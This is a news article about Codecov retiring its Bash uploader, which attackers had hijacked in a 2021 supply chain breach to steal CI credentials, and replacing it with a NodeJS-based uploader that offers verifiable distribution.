Codecov to retire the Bash script responsible for supply chain attack wave
Codecov has introduced a new uploader that relies on NodeJS to replace and remove a Bash script responsible for a recent supply chain attack.
The San Francisco-based DevOps tool provider said in a blog post that the new uploader will be shipped as a static binary executable suitable for Windows, Linux, Alpine Linux, and macOS.
The uploader, used in the same manner as the existing Bash uploader, is used to push coverage data and updates to products during development cycles. The uploader is currently in the Beta stage and so is yet to be fully integrated, but Codecov says that “most standard workflows that are currently accomplished with the Bash Uploader can be accomplished with the new uploader.”
Codecov’s Bash uploader was the source of a string of supply chain attacks taking place around January 31, 2021, made public on April 15.
By infiltrating Codecov’s network and hijacking the Bash uploader, the threat actors ensured that rather than pushing “healthier” code during project updates, as Codecov intends, users were, instead, subject to the theft of information stored in their continuous integration (CI) environments.
The attack may have also allowed the attackers to “raid additional resources,” according to investigators brought in after the breach was made public — including credentials, potentially leading to wider network compromise in some cases.
Codecov’s Bash uploader range — the Codecov-actions uploader for Github, CircleCl Orb, and Bitrise Step — were all impacted.
The company says that with the introduction of the new uploader, all other language-specific uploaders will be depreciated, with “special attention” paid to the Bash uploader at fault.
Codecov has been working on the NodeJS uploader for eight months, originally to reduce the increasing complexity of facilitating uploads and maintenance as the Codecov customer base increased.
Now that the Bash script is tied to a severe security incident, however, the upgrade has become an urgent necessity.
“The distribution mechanism of choice (i.e., curl pipe to bash) while incredibly convenient, is notoriously problematic from a security perspective,” Codecov said. “The weaknesses of the curl | bash approach came to the forefront during [the] recent security event.”
The new uploader is now available for public use under the Beta umbrella and includes a more secure, verifiable distribution architecture, protections against unauthorized code modification, and an improved CI/CD pipeline for conducting automated testing of the uploader on Windows, Linux, and macOS.
Codecov hopes to depreciate the Bash uploader from November, with a full sunset of the system planned for after February 1, 2022. The organization has also outlined other security improvements in the wake of the attacks.
Previous and related coverage
Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0